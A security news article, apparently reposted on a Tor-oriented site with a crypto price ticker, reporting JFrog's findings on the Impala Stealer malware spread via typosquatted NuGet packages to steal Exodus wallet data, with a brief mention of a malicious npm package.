BTC $65266.0064
ETH $3170.2759
BNB $579.9567
SOL $151.5810
stETH $3170.3792
XRP $0.5307
DOGE $0.1622
TON $6.2152
ADA $0.5047
AVAX $37.5087
wstETH $3690.1011
WBTC $65350.8728
DOT $7.1858
WETH $3168.2550
TRX $0.1112
BCH $512.3933
LINK $14.9136
MATIC $0.7262
ICP $15.2978
UNI $7.8248
LTC $85.1449
DAI $1.0008
RNDR $9.1190
CAKE $2.9399
IMX $2.1935
STX $2.8650
ETC $27.9082
FDUSD $0.9998
MNT $1.2003
NEAR $6.3271
FIL $6.6129
OKB $55.7832
HBAR $0.0909
TAO $475.1056
VET $0.0423
WIF $3.0785
ATOM $8.6865
MKR $3070.6157
KAS $0.1185
FET $2.4759
GRT $0.2860
INJ $29.1371
PEPE $0.0000
USDE $0.9998
XLM $0.1150
THETA $2.2569
XMR $121.6010
BTC $65266.0064
ETH $3170.2759
BNB $579.9567
SOL $151.5810
stETH $3170.3792
XRP $0.5307
DOGE $0.1622
TON $6.2152
ADA $0.5047
AVAX $37.5087
wstETH $3690.1011
WBTC $65350.8728
DOT $7.1858
WETH $3168.2550
TRX $0.1112
BCH $512.3933
LINK $14.9136
MATIC $0.7262
ICP $15.2978
UNI $7.8248
LTC $85.1449
DAI $1.0008
RNDR $9.1190
CAKE $2.9399
IMX $2.1935
STX $2.8650
ETC $27.9082
FDUSD $0.9998
MNT $1.2003
NEAR $6.3271
FIL $6.6129
OKB $55.7832
HBAR $0.0909
TAO $475.1056
VET $0.0423
WIF $3.0785
ATOM $8.6865
MKR $3070.6157
KAS $0.1185
FET $2.4759
GRT $0.2860
INJ $29.1371
PEPE $0.0000
USDE $0.9998
XLM $0.1150
THETA $2.2569
XMR $121.6010
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • Impala Stealer: another cryptocurrency thief has reached the developers, this time through the NuGet platform

    How secure are public software repositories in general?

    Cybersecurity researchers recently discovered cryptocurrency-stealing malware that was distributed through the NuGet developer platform disguised as 13 fake packages.

    The sophisticated typesquatting campaign, described in detail by JFrog experts, consisted of attackers presenting their malware as popular legitimate packages often used by developers. The effect was achieved by copying the names of these popular packages, albeit with minor changes. And since even legitimate packages often have complicated names, it doesn't cost anything for developers to accidentally confuse packages and download malware onto a computer.

    The two-stage attack culminated in the deployment of a permanent .NET-based "Impala Stealer" backdoor capable of gaining unauthorized access to victims' cryptocurrency wallet accounts.

    "The payload used a very rare obfuscation technique called .NET AoT Compilation, which is much more stealthy than using off-the-shelf obfuscators, but also makes it difficult to reverse engineer the binary," JFrog said in a statement.

    .NET AoT Compilation is an optimization technique that lets you pre-compile applications to native code. Native AoT applications start faster and require less memory, and can also run on a machine without the .NET runtime installed.

    The second stage payload comes with an automatic update mechanism that allows you to get new versions of the executable from a remote location. In addition, the mechanism ensures that the malware persists on the victim's system by injecting JavaScript code into Discord applications or Microsoft Visual Studio Code, thereby activating the launch of the stealer binary.

    The binary then proceeds to look for the installed Exodus Wallet desktop app and injects JavaScript code into various HTML files to collect and exfiltrate sensitive data into Discord's hard-coded webhook.

    “The attackers used typesquatting techniques to deploy a custom malicious payload that targeted the Exodus crypto wallet,” said Shachar Menashe, senior director at JFrog Security Research.

    Downloading malicious packages to the platforms used by developers has already become commonplace. For example, shortly before the JFrog report, Phylum researchers discovered a malicious package named mathjs-min in the NPM service. The package contained a credential thief that grabbed passwords from the official Discord app, as well as web browsers such as Google Chrome, Brave, and Opera.

    “Our investigation proves that no open source software repository is completely trustworthy, so security measures must be taken at every stage of the software development life cycle to ensure the security of the software supply chain,” JFrog concluded.
    Author DeepWeb
    A major cloud provider has been cyberattacked due to a bug in the Linux kernel
    China is developing covert cyberweapons to hijack US satellites

    Comments 0

    Add comment